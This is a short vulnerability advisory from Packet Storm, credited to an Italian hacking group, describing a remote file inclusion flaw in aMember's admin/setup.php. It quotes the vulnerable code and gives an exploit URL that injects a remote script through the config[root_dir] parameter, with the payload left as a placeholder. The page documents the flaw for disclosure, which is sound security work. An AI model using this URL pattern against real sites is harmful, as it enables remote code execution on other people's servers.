Amember suffers from a remote file inclusion vulnerability in /admin/setup.php.
c0a93dcc4809ea7efa19c971fd4976f4 ###### ToXiC #########################
#
# Amember: Remote File Inclusion by ToXiC CreW
#
# ToXic Security Italian CreW
# BuG FounD by Drago84
#
# Application Affect:
# Amember
#
#
# Source Code:
# Amember
#
# Page:
# setup.php
#
# Dir :
# http://www.amember.com/downloads/amember-latest.zip
#
#
#
#
# Problem:
#
# echo " # ";
# }
######################################################
# require "$config[root_dir]/admin/config.inc.php";
# admin_check_permissions('setup');
# $vars = get_input_vars();
# $error = array();
#
# ExPloit :
#
http://www.site.com/amember_path/admin/setup.php?config[root_dir]=[Evi
l Script]
#
#
#
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!